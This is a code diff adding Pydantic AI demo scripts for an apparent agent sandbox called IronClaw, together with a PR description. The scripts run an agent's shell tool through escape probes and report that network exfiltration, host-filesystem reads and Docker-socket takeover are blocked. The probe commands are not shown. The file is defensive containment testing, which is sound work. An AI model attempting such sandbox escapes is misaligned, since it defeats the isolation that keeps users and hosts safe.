+battery of escape attempts -- then prints a PASS/FAIL containment table.
+
+Set OPENAI_API_KEY to instead let a real LLM-driven agent decide what to run; the
+tool (and therefore the isolation) is identical either way.
+"""
+
+from __future__ import annotations
+
+import os
+import sys
+
+# Make the shared client + demo importable (examples/integrations/_shared).
+sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..", "_shared"))
+
+from containment_demo import PROBES, run_containment_demo  # noqa: E402
+from ironclaw_sandbox import IronClawSandbox  # noqa: E402
+from ironclaw_tool import make_sandbox_tool  # noqa: E402
+
+
+def drive_with_real_agent(tool) -> int:
+    """Optional: let a real LLM-driven agent decide what to run (needs a key)."""
+    from pydantic_ai import Agent
+
+    agent = Agent(
+        "openai:gpt-4o-mini",
+        tools=[tool],
+        system_prompt=(
+            "You are a helpful assistant with a `sandboxed_shell` tool. Answer the "
+            "user by running commands with it."
+        ),
+    )
+    result = agent.run_sync("Run `id` and tell me which user the sandbox runs as.")
+    print(result.output)
+    return 0
+
+
+def main() -> int:
+    print("==> engaging an IronClaw per-session sandbox (mock provider, zero-cred)")
+    with IronClawSandbox() as sandbox:
+        print(f"    sandbox container: {sandbox.container}")
+        tool = make_sandbox_tool(sandbox)
+
+        if os.environ.get("OPENAI_API_KEY"):
+            print("==> OPENAI_API_KEY set: driving a real Pydantic AI agent")
+            return drive_with_real_agent(tool)
+
+        # Deterministic, zero-cred path: call the exact function Pydantic AI would
+        # invoke for a `sandboxed_shell` tool call, for each probe.
+        print(f"==> driving the '{tool.name}' tool over {len(PROBES)} agent commands")
+        return run_containment_demo(
+            lambda command: str(tool.function(command=command)),
+            framework="Pydantic AI",
+        )
+
+
+if __name__ == "__main__":
+    raise SystemExit(main())

--- a/examples/integrations/pydantic-ai/run.sh
+++ b/examples/integrations/pydantic-ai/run.sh
@@ -1,0 +1,29 @@
+#!/usr/bin/env bash
+# Pydantic AI + IronClaw sandbox -- one-command demo.
+#
+# Brings up the offline demo control-plane (mock provider -- no model key, no
+# channel tokens), then runs a Pydantic AI agent whose `sandboxed_shell` tool
+# executes inside a real IronClaw per-session sandbox. It runs one benign task
+# and a battery of escape attempts and prints a PASS/FAIL containment table.
+#
+#   examples/integrations/pydantic-ai/run.sh           # build + up + demo + tear down
+#   examples/integrations/pydantic-ai/run.sh --keep     # leave the demo running
+#   examples/integrations/pydantic-ai/run.sh --attach   # use an already-running demo
+#
+# Env overrides (all optional):
+#   IRONCLAW_ADDR        control-plane base URL  (default http://127.0.0.1:8787)
+#   IRONCLAW_API_TOKEN   API bearer token        (default ironclaw-demo)
+#   IRONCLAW_DEMO_AGENT  agent group id          (default mock-agent)
+#   SKIP_BUILD=1         skip the sandbox image build (assume it exists)
+#   OPENAI_API_KEY       if set, drive a real LLM agent instead of the scripted one
+set -euo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+REPO_ROOT="$(cd "$SCRIPT_DIR/../../.." && pwd)"
+source "$SCRIPT_DIR/../_shared/demo-lifecycle.sh"
+
+ensure_demo_up "$@"
+setup_venv "$SCRIPT_DIR"
+
+echo "==> running the Pydantic AI sandbox demo"
+python "$SCRIPT_DIR/run.py"


### PR DESCRIPTION
## What

Expands framework coverage with first-class **LlamaIndex** and **Pydantic AI** sandbox integration examples, mirroring the existing LangChain/CrewAI pattern (IRO-346/347). Every new framework is a new inbound channel (its community, docs, awesome-list).

## Changes

- `examples/integrations/llamaindex/` — `FunctionTool` adapter (`ironclaw_tool.py`) wrapping the shared `_shared/ironclaw_sandbox.py` client, plus `run.sh`/`run.py`/`requirements.txt`/`README.md`.
- `examples/integrations/pydantic-ai/` — Pydantic AI `Tool` adapter, same shape.
- `docs/integrations/` — one search-intent "Sandbox your \<framework\> agent with IronClaw" page per framework; nav fragment, index table, and intro wired.
- `examples/integrations/README.md` — both frameworks added to the table + pattern list.
- `examples/smoke-matrix.sh` needs no wiring: it auto-discovers `examples/integrations/*/`.

## Verification

Both examples run end-to-end against a **real `ic-sbx-*` per-session sandbox** (mock provider, zero credentials), exec as uid **65532**, `network=none`:

| Framework | Result | Session |
|---|---|---|
| LlamaIndex | **PASS** (5/5) | `ic-sbx-ses_2efba8d5dbab62de` |
| Pydantic AI | **PASS** (5/5) | `ic-sbx-ses_2efba8d5dbab62de` |

Benign agent code runs; **network exfil, host-filesystem read, and Docker-socket takeover are all BLOCKED**. `mkdocs build --strict` passes (exit 0).

## Security lenses

- **Isolation / trust boundary**: examples only `docker exec` into the existing per-session sandbox as its own non-root uid — the exact privilege a jailbroken agent has. No new capability granted to the sandbox; containment is asserted, not assumed.
- No contract change, no key handling, no egress path added.

Closes IRO-365.